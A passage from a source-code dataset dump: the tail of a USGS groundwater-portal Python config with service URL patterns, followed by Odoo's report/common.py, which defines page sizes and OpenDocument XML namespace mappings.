'=NGWMN+Statistics+Methods&labelString=ngwmn-stat-meth&excludedSpaceKeys%3D&sort=modified' \
'&maxResults=10&timeSpan=5000&showContent=true&confirm=Create+RSS+Feed '
# URL pattern for retrieving SIFTA cooperator logos
COOPERATOR_SERVICE_PATTERN = 'https://water.usgs.gov/customer/stories/{site_no}&StartDate=10/1/{year}&EndDate={current_date}'
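# Hedged sketch (assumption: ngwmn-ui is a Flask app; its actual startup code is not
# part of this file). In a separate application module these upper-case names would
# typically be loaded with something like:
#
#   from flask import Flask
#   app = Flask(__name__)
#   app.config.from_object('server.config')   # or app.config.from_pyfile(...)
#   service_root = app.config['SERVICE_ROOT']
#
# Flask only picks up upper-case attributes, which is why the settings above are
# written that way.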
| 39.5 | 125 | 0.735584 |
dffcffa859cf4d567ee47e96c68407f75a150ff8 | 2,382 | py | Python | apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/report/common.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | ["Apache-2.0"] | 1 | 2019-12-19T01:53:13.000Z | 2019-12-19T01:53:13.000Z | apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/report/common.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | ["Apache-2.0"] | null | null | null | apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/report/common.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
pageSize = {
'A4': (210,297),
'A5': (148.5,105)
}
odt_namespace = {
"office":"{urn:oasis:names:tc:opendocument:xmlns:office:1.0}",
"style":"{urn:oasis:names:tc:opendocument:xmlns:style:1.0}",
"text":"{urn:oasis:names:tc:opendocument:xmlns:text:1.0}",
"table":"{urn:oasis:names:tc:opendocument:xmlns:table:1.0}",
"draw":"{urn:oasis:names:tc:opendocument:xmlns:drawing:1.0}",
"fo":"{urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0}",
"xlink":"{http://www.w3.org/1999/xlink}",
"dc":"{http://purl.org/dc/elements/1.1/}",
"meta":"{urn:oasis:names:tc:opendocument:xmlns:meta:1.0}",
"number":"{urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0}",
"svg":"{urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0}",
"chart":"{urn:oasis:names:tc:opendocument:xmlns:chart:1.0}",
"dr3d":"{urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0}",
"math":"{http://www.w3.org/1998/Math/MathML}",
"form":"{urn:oasis:names:tc:opendocument:xmlns:form:1.0}",
"script":"{urn:oasis:names:tc:opendocument:xmlns:script:1.0}",
"ooo":"{http://openoffice.org/2004/office}",
"ooow":"{http://openoffice.org/2004/writer}",
"oooc":"{http://openoffice.org/2004/calc}",
"dom":"{http://www.w3.org/2001/xml-events}" }
sxw_namespace = {
"office":"{http://openoffice.org/2000/office}",
"style":"{http://openoffice.org/2000/style}",
"text":"{http://openoffice.org/2000/text}",
"table":"{http://openoffice.org/2000/table}",
"draw":"{http://openoffice.org/2000/drawing}",
"fo":"{http://www.w3.org/1999/XSL/Format}",
"xlink":"{http://www.w3.org/1999/xlink}",
"dc":"{http://purl.org/dc/elements/1.1/}",
"meta":"{http://openoffice.org/2000/meta}",
"number":"{http://openoffice.org/2000/datastyle}",
"svg":"{http://www.w3.org/2000/svg}",
"chart":"{http://openoffice.org/2000/chart}",
"dr3d":"{http://openoffice.org/2000/dr3d}",
"math":"{http://www.w3.org/1998/Math/MathML}",
"form":"{http://openoffice.org/2000/form}",
"script":"{http://openoffice.org/2000/script}",
"ooo":"{http://openoffice.org/2004/office}",
"ooow":"{http://openoffice.org/2004/writer}",
"oooc":"{http://openoffice.org/2004/calc}",
"dom":"{http://www.w3.org/2001/xml-events}"}
| 45.807692 | 74 | 0.628463 |